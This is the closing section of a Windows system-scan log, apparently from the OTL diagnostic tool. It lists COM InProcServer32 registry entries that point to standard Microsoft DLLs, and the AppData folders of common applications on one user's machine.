 

[HKEY_CURRENT_USER\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32] /64

 

[HKEY_CURRENT_USER\Software\Classes\Wow6432node\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]

 

[HKEY_CURRENT_USER\Software\Classes\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InProcServer32] /64

 

[HKEY_CURRENT_USER\Software\Classes\Wow6432node\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InProcServer32]

 

[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32] /64

"" = C:\Windows\SysNative\shell32.dll -- [2013.02.27 07:52:56 | 014,172,672 | ---- | M] (Microsoft Corporation)

"ThreadingModel" = Apartment

 

[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]

"" = %SystemRoot%\system32\shell32.dll -- [2013.02.27 06:55:05 | 012,872,704 | ---- | M] (Microsoft Corporation)

"ThreadingModel" = Apartment

 

[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InProcServer32] /64

"" = C:\Windows\SysNative\wbem\fastprox.dll -- [2012.08.21 15:11:31 | 000,857,088 | ---- | M] (Microsoft Corporation)

"ThreadingModel" = Free

 

[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InProcServer32]

"" = %systemroot%\system32\wbem\fastprox.dll -- [2012.08.21 15:37:44 | 000,636,928 | ---- | M] (Microsoft Corporation)

"ThreadingModel" = Free

 

[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InProcServer32] /64

"" = C:\Windows\SysNative\wbem\wbemess.dll -- [2012.08.21 15:08:38 | 000,453,120 | ---- | M] (Microsoft Corporation)

"ThreadingModel" = Both

 

[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InProcServer32]

 
 ========== LOP Check ==========

 

[2013.03.02 21:19:51 | 000,000,000 | ---D | M] -- d:\Users\Dani\AppData\Roaming\Audacity

[2013.04.14 00:01:25 | 000,000,000 | ---D | M] -- d:\Users\Dani\AppData\Roaming\DAEMON Tools Lite

[2013.04.05 19:31:17 | 000,000,000 | ---D | M] -- d:\Users\Dani\AppData\Roaming\e-academy Inc

[2013.02.05 22:18:30 | 000,000,000 | ---D | M] -- d:\Users\Dani\AppData\Roaming\Line 6

[2012.08.10 00:42:32 | 000,000,000 | ---D | M] -- d:\Users\Dani\AppData\Roaming\LolClient

[2012.10.02 17:52:47 | 000,000,000 | ---D | M] -- d:\Users\Dani\AppData\Roaming\PACE Anti-Piracy

[2013.04.04 16:04:35 | 000,000,000 | ---D | M] -- d:\Users\Dani\AppData\Roaming\raidcall

[2012.10.05 01:22:43 | 000,000,000 | ---D | M] -- d:\Users\Dani\AppData\Roaming\TeamViewer

[2012.10.22 18:57:15 | 000,000,000 | ---D | M] -- d:\Users\Dani\AppData\Roaming\Trillian

[2013.06.07 00:14:57 | 000,000,000 | ---D | M] -- d:\Users\Dani\AppData\Roaming\TS3Client

[2012.08.15 01:09:41 | 000,000,000 | ---D | M] -- d:\Users\Dani\AppData\Roaming\ts3overlay

[2012.10.02 17:53:23 | 000,000,000 | ---D | M] -- d:\Users\Dani\AppData\Roaming\Unity

 
 ========== Purity Check ==========

 

 
 

< End of report >